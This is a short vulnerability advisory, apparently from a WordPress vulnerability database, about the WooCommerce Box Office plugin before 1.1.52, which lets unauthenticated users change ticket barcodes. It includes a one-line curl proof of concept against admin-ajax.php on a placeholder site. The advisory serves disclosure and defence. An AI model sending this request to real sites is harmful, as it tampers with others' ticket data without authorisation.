WooCommerce Box Office < 1.1.52 - Unauthenticated Ticket Barcode Update

2023-06-0200:00:00

wpvulndb

woocommerce

box office

unauthenticated

ticket

barcode

update

vulnerability

exploit

0.0004 Low

EPSS

Percentile

9.1%

JSON

The plugin does not have authorisation and CSRF when updating a ticket bar-code, allowing unauthenticated users to perform such action

curl https://example.com/wp-admin/admin-ajax.php -d "action=save_ticket_barcode&ticket_barcode_image=xxx&ticket_barcode_text=xxxxx&ticket_id=86"

References

patchstack.com/database/vulnerability/woocommerce-box-office/wordpress-woocommerce-box-office-plugin-1-1-51-unauthenticated-save-ticket-barcode-vulnerability

0.0004 Low

EPSS

Percentile

9.1%

JSON

Related for WPEX-ID:368897AB-72B8-4FFC-ADC6-B5970BE2ABA6